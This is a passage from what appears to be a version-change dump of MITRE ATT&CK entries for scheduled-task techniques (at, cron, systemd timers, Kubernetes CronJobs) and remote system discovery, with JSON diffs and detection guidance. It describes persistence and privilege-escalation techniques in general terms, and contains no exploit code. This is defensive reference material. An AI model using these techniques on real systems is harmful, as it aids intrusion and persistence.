\"3.1\"}}}",
"previous_version": "3.1",
"version_change": "3.1 \u2192 3.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to get a listing of other systems by | t | 1 | Adversaries may attempt to get a listing of other systems by |
| > | IP address, hostname, or other logical identifier on a netw | > | IP address, hostname, or other logical identifier on a netw | ||
| > | ork that may be used for Lateral Movement from the current s | > | ork that may be used for Lateral Movement from the current s | ||
| > | ystem. Functionality could exist within remote access tools | > | ystem. Functionality could exist within remote access tools | ||
| > | to enable this, but utilities available on the operating sys | > | to enable this, but utilities available on the operating sys | ||
| > | tem could also be used such as [Ping](https://attack.mitre. | > | tem could also be used such as [Ping](https://attack.mitre. | ||
| > | org/software/S0097) or <code>net view</code> using [Net](htt | > | org/software/S0097) or <code>net view</code> using [Net](htt | ||
| > | ps://attack.mitre.org/software/S0039). Adversaries may also | > | ps://attack.mitre.org/software/S0039). Adversaries may also | ||
| > | use local host files (ex: <code>C:\\Windows\\System32\\Drivers\\ | > | use local host files (ex: <code>C:\\Windows\\System32\\Drivers\\ | ||
| > | etc\\hosts</code> or <code>/etc/hosts</code>) in order to dis | > | etc\\hosts</code> or <code>/etc/hosts</code>) in order to dis | ||
| > | cover the hostname to IP address mappings of remote systems. | > | cover the hostname to IP address mappings of remote systems. | ||
| > | Specific to macOS, the <code>bonjour</code> protocol exis | > | |||
| > | ts to discover additional Mac-based systems within the same | ||||
| > | broadcast domain. |
sudo.(Citation: GTFObins at)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1053/001",
"external_id": "T1053.001"
},
{
"source_name": "Kifarunix - Task Scheduling in Linux",
"description": "Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.",
"url": "https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/"
},
{
"source_name": "GTFObins at",
"description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.",
"url": "https://gtfobins.github.io/gtfobins/at/"
},
{
"source_name": "rowland linux at 2019",
"description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.",
"url": "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Scheduled Job: Scheduled Job Creation",
"Command: Command Execution",
"Process: Process Creation"
],
"x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:36:26.063000+00:00\", \"old_value\": \"2020-03-23 22:35:13.112000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\\n\\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\\n\\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)\", \"old_value\": \"Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\\n\\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\\n+Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\\n \\n An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\\n+\\n+Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \\n\\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\\n\\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\", \"old_value\": \"Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \\n\\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \\n \\n+Review all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\\n+\\n Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"GTFObins at\", \"description\": \"Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.\", \"url\": \"https://gtfobins.github.io/gtfobins/at/\"}, \"root['external_references'][3]\": {\"source_name\": \"rowland linux at 2019\", \"description\": \"Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.\", \"url\": \"https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse the [at](https://attack.mitre.org/soft | t | 1 | Adversaries may abuse the [at](https://attack.mitre.org/soft |
| > | ware/S0110) utility to perform task scheduling for initial o | > | ware/S0110) utility to perform task scheduling for initial, | ||
| > | r recurring execution of malicious code. The [at](https://at | > | recurring, or future execution of malicious code. The [at](h | ||
| > | tack.mitre.org/software/S0110) command within Linux operatin | > | ttps://attack.mitre.org/software/S0110) command within Linux | ||
| > | g systems enables administrators to schedule tasks.(Citation | > | operating systems enables administrators to schedule tasks. | ||
| > | : Kifarunix - Task Scheduling in Linux) An adversary may us | > | (Citation: Kifarunix - Task Scheduling in Linux) An adversa | ||
| > | e [at](https://attack.mitre.org/software/S0110) in Linux env | > | ry may use [at](https://attack.mitre.org/software/S0110) in | ||
| > | ironments to execute programs at system startup or on a sche | > | Linux environments to execute programs at system startup or | ||
| > | duled basis for persistence. [at](https://attack.mitre.org/s | > | on a scheduled basis for persistence. [at](https://attack.mi | ||
| > | oftware/S0110) can also be abused to conduct remote Executio | > | tre.org/software/S0110) can also be abused to conduct remote | ||
| > | n as part of Lateral Movement and or to run a process under | > | Execution as part of Lateral Movement and or to run a proce | ||
| > | the context of a specified account. | > | ss under the context of a specified account. Adversaries ma | ||
| > | y also abuse [at](https://attack.mitre.org/software/S0110) t | ||||
| > | o break out of restricted environments by using a task to sp | ||||
| > | awn an interactive system shell or to run system commands. S | ||||
| > | imilarly, [at](https://attack.mitre.org/software/S0110) may | ||||
| > | also be used for [Privilege Escalation](https://attack.mitre | ||||
| > | .org/tactics/TA0004) if the binary is allowed to run as supe | ||||
| > | ruser via <code>sudo</code>.(Citation: GTFObins at) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse task scheduling functionality provided | t | 1 | Adversaries may abuse task scheduling functionality provided |
| > | by container orchestration tools such as Kubernetes to sche | > | by container orchestration tools such as Kubernetes to sche | ||
| > | dule deployment of containers configured to execute maliciou | > | dule deployment of containers configured to execute maliciou | ||
| > | s code. Container orchestration jobs run these automated tas | > | s code. Container orchestration jobs run these automated tas | ||
| > | ks at a specific date and time, similar to cron jobs on a Li | > | ks at a specific date and time, similar to cron jobs on a Li | ||
| > | nux system. Deployments of this type can also be configured | > | nux system. Deployments of this type can also be configured | ||
| > | to maintain a quantity of containers over time, automating t | > | to maintain a quantity of containers over time, automating t | ||
| > | he process of maintaining persistence within a cluster. In | > | he process of maintaining persistence within a cluster. In | ||
| > | Kubernetes, a CronJob may be used to schedule a Job that run | > | Kubernetes, a CronJob may be used to schedule a Job that run | ||
| > | s one or more containers to perform specific tasks.(Citation | > | s one or more containers to perform specific tasks.(Citation | ||
| > | : Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversar | > | : Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversar | ||
| > | y therefore may utilize a CronJob to schedule deployment of | > | y therefore may utilize a CronJob to schedule deployment of | ||
| > | a Job that executes malicious code in the cluster.(Citation: | > | a Job that executes malicious code in various nodes within a | ||
| > | Threat Matrix for Kubernetes) | > | cluster.(Citation: Threat Matrix for Kubernetes) |
cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1053/003",
"external_id": "T1053.003"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Scheduled Job: Scheduled Job Creation",
"Command: Command Execution",
"File: File Modification",
"Process: Process Creation"
],
"x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS"
],
"x_mitre_remote_support": false,
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-23 15:29:36.918000+00:00\", \"old_value\": \"2020-03-23 23:30:46.546000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\\n\\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. \", \"old_value\": \"Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\\n\\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\\n+Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\\n \\n-An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\\n+An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][1]\": {\"source_name\": \"20 macOS Common Tools and Techniques\", \"description\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"url\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse the <code>cron</code> utility to perfo | t | 1 | Adversaries may abuse the <code>cron</code> utility to perfo |
| > | rm task scheduling for initial or recurring execution of mal | > | rm task scheduling for initial or recurring execution of mal | ||
| > | icious code. The <code>cron</code> utility is a time-based j | > | icious code.(Citation: 20 macOS Common Tools and Techniques) | ||
| > | ob scheduler for Unix-like operating systems. The <code> cr | > | The <code>cron</code> utility is a time-based job scheduler | ||
| > | ontab</code> file contains the schedule of cron entries to b | > | for Unix-like operating systems. The <code> crontab</code> | ||
| > | e run and the specified times for execution. Any <code>cront | > | file contains the schedule of cron entries to be run and th | ||
| > | ab</code> files are stored in operating system-specific file | > | e specified times for execution. Any <code>crontab</code> fi | ||
| > | paths. An adversary may use <code>cron</code> in Linux or | > | les are stored in operating system-specific file paths. An | ||
| > | Unix environments to execute programs at system startup or o | > | adversary may use <code>cron</code> in Linux or Unix environ | ||
| > | n a scheduled basis for persistence. <code>cron</code> can a | > | ments to execute programs at system startup or on a schedule | ||
| > | lso be abused to conduct remote Execution as part of Lateral | > | d basis for persistence. | ||
| > | Movement and or to run a process under the context of a spe | ||||
| > | cified account. |
.timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1053/006",
"external_id": "T1053.006"
},
{
"source_name": "archlinux Systemd Timers Aug 2020",
"description": "archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.",
"url": "https://wiki.archlinux.org/index.php/Systemd/Timers"
},
{
"source_name": "Systemd Remote Control",
"description": "Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.",
"url": "https://www.tecmint.com/control-systemd-services-on-remote-linux-server/"
},
{
"source_name": "Linux man-pages: systemd January 2014",
"description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.",
"url": "http://man7.org/linux/man-pages/man1/systemd.1.html"
},
{
"source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018",
"description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.",
"url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/"
},
{
"source_name": "gist Arch package compromise 10JUL2018",
"description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.",
"url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a"
},
{
"source_name": "acroread package compromised Arch Linux Mail 8JUL2018",
"description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.",
"url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"SarathKumar Rajendran, Trimble Inc"
],
"x_mitre_data_sources": [
"Scheduled Job: Scheduled Job Creation",
"Command: Command Execution",
"File: File Modification",
"Process: Process Creation"
],
"x_mitre_detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers \u2013all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"Linux"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": true}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-27 16:43:25.027000+00:00\", \"old_value\": \"2020-10-14 15:20:00.754000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\\n\\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\\n\\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.\", \"old_value\": \"Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)\\n\\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\\n\\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)\\n+Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\\n \\n Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\\n \"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Systemd Remote Control\", \"old_value\": \"Linux man-pages: systemd January 2014\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.\", \"old_value\": \"Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://www.tecmint.com/control-systemd-services-on-remote-linux-server/\", \"old_value\": \"http://man7.org/linux/man-pages/man1/systemd.1.html\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Linux man-pages: systemd January 2014\", \"old_value\": \"Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.\", \"old_value\": \"Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"http://man7.org/linux/man-pages/man1/systemd.1.html\", \"old_value\": \"https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018\", \"old_value\": \"gist Arch package compromise 10JUL2018\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.\", \"old_value\": \"Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/\", \"old_value\": \"https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"gist Arch package compromise 10JUL2018\", \"old_value\": \"acroread package compromised Arch Linux Mail 8JUL2018\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.\", \"old_value\": \"Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a\", \"old_value\": \"https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][6]\": {\"source_name\": \"acroread package compromised Arch Linux Mail 8JUL2018\", \"description\": \"Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.\", \"url\": \"https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse systemd timers to perform task schedul | t | 1 | Adversaries may abuse systemd timers to perform task schedul |
| > | ing for initial or recurring execution of malicious code. Sy | > | ing for initial or recurring execution of malicious code. Sy | ||
| > | stemd timers are unit files with file extension <code>.timer | > | stemd timers are unit files with file extension <code>.timer | ||
| > | </code> that control services. Timers can be set to run on a | > | </code> that control services. Timers can be set to run on a | ||
| > | calendar event or after a time span relative to a starting | > | calendar event or after a time span relative to a starting | ||
| > | point. They can be used as an alternative to [Cron](https:// | > | point. They can be used as an alternative to [Cron](https:// | ||
| > | attack.mitre.org/techniques/T1053/003) in Linux environments | > | attack.mitre.org/techniques/T1053/003) in Linux environments | ||
| > | .(Citation: archlinux Systemd Timers Aug 2020) Each <code>. | > | .(Citation: archlinux Systemd Timers Aug 2020) Systemd timer | ||
| > | timer</code> file must have a corresponding <code>.service</ | > | s may be activated remotely via the <code>systemctl</code> c | ||
| > | code> file with the same name, e.g., <code>example.timer</co | > | ommand line utility, which operates over [SSH](https://attac | ||
| > | de> and <code>example.service</code>. <code>.service</code> | > | k.mitre.org/techniques/T1021/004).(Citation: Systemd Remote | ||
| > | files are [Systemd Service](https://attack.mitre.org/techniq | > | Control) Each <code>.timer</code> file must have a correspo | ||
| > | ues/T1543/002) unit files that are managed by the systemd sy | > | nding <code>.service</code> file with the same name, e.g., < | ||
| > | stem and service manager.(Citation: Linux man-pages: systemd | > | code>example.timer</code> and <code>example.service</code>. | ||
| > | January 2014) Privileged timers are written to <code>/etc/s | > | <code>.service</code> files are [Systemd Service](https://at | ||
| > | ystemd/system/</code> and <code>/usr/lib/systemd/system</cod | > | tack.mitre.org/techniques/T1543/002) unit files that are man | ||
